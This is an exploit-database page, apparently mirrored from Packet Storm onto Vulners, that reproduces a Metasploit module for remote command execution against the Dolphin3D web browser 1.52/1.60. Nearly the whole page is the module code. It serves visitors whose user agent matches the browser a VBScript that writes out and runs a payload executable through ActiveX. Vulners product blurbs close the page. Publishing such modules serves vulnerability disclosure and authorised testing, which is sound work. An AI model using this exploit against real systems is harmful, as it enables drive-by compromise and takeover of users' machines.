Lucene search
K

Dolphin3D 1.52 / 1.60 Command Execution

🗓️ 09 Dec 2012 00:00:00Reported by Rh0Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Dolphin3D 1.52/1.60 Command Execution in Web Browse

Code
`##  
#  
# Dolphin3D web browser ActiveX Remote Command Execution  
#  
# Date: Dez 9 2012  
# Author: Rh0  
# Affected Version: Dolphin3D 1.52 and 1.60  
# Tested on: Windows XP Professional SP3 EN  
#  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::EXE  
  
def initialize(info = {})   
super(update_info(info,  
'Name' => 'Dolphin3D web browser ActiveX Exec',  
'Description' => %q{   
This module exploits the default security setting in the  
Dolphin3D web browser. The default security setting ("cautious")  
allows arbitrary ActiveX Controls, thus remote command execution.  
},  
## NOTE: There exists a higher security setting called "jungle-safe".  
## It disables javascript/vbscript completely, which is the  
## the only measure to forbit unsafe ActiveX Objects.  
## bug vs. feature :) see: http://www.dolphin3d.com/safest.html  
'Author' =>   
[   
'Rh0 <rh0[at]z1p.biz>', # discovery and metasploit module  
],  
'Targets' =>   
[   
[ 'Windows - Dolphin3D Browser 1.52 and 1.60',  
{   
'Platform' => 'win',  
'Arch' => ARCH_X86  
}   
],   
],   
'DefaultTarget' => 0,  
'Platform' => ['win'],  
'DisclosureDate' => "Dez 9 2012"  
))  
end  
  
def on_request_uri(cli,request)  
agent = request.headers['USER-AGENT']  
if request.uri =~ /\.ico/  
print_status("Ignoring request for #{request.uri}")  
send_not_found(cli)  
## dolphin user agent ends with "Avant Browser)"  
## could conflict with Avant Browser, see  
## http://www.useragentstring.com/_uas_Avant%20Browser_version_.php)  
elsif agent =~ /Avant Browser\)$/  
print_status("Sending vbs payload")  
send_response(cli,exe_script,{"Content-Type" => "text/html"})  
else  
print_status("Ignoring request from #{agent}")  
send_not_found(cli)  
end  
end  
  
def exe_script()  
exe = generate_payload_exe()  
vbs = Msf::Util::EXE.to_exe_vbs(exe)  
#vbs = 'CreateObject("wscript.shell").run"calc",1,false' # PoC  
return "<script language=vbscript>#{vbs}</script>"  
  
end  
end  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation